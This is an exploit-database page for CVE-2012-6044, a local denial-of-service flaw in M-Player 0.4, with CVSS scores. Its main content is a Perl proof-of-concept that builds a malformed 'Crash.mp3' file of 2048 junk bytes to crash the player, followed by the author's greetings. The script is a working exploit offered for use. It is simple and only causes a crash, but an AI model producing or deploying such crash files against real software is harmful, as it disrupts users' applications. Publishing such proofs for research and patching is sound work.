Home
Bugtraq
Full List
Only Bugs
Only Tricks
Only Exploits
Only Dorks
Only CVE
Only CWE
Fake Notes
Ranking
CVEMAP
Full List
Show Vendors
Show Products
CWE Dictionary
Check CVE Id
Check CWE Id
Search
Bugtraq
CVEMAP
By author
CVE Id
CWE Id
By vendors
By products
RSS
Bugtraq
CVEMAP
CVE Products
Bugs
Exploits
Dorks
More
cIFrex
Facebook
Twitter
Donate
About
Submit
M-Player 0.4 Local Denial of Service Vulnerability
2012-01-09 / 2012-11-28
Credit:
JaMbA
Risk:
Medium
Local:
Yes
Remote:
No
CVE:
CVE-2012-6044
CWE:
CWE-20
CVSS Base Score:
4.3/10
Impact Subscore:
2.9/10
Exploitability Subscore:
8.6/10
Exploit range:
Remote
Attack complexity:
Medium
Authentication:
No required
Confidentiality impact:
None
Integrity impact:
None
Availability impact:
Partial
#!/usr/bin/perl # Exploit Title: M-Player 0.4 Local Denial of Service Vulnerability # Date: 08/01/2012 # Author: JaMbA # Download: http://www.softpedia.com/get/Multimedia/Audio/Audio-Players/M-Player.shtml # Version: 0.4 # Tested on: Windows 7 my $file= "Crash.mp3"; my $junk= "\x41" x 2048; open($FILE,">$file"); print $FILE $junk; print "\nCrash.mp3 File Created successfully\n"; print "\ I'am From Tunisia (Ahmadso best Friend)\n"; print "\ Dz-Devloper Work Team (wanted_29 Dr.Smt z4k!_xy ak27 DR.KIM Samoray Mr_Ghost)\n"; close($FILE);
References:
http://www.softpedia.com/get/Multimedia/Audio/Audio-Players/M-Player.shtml
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top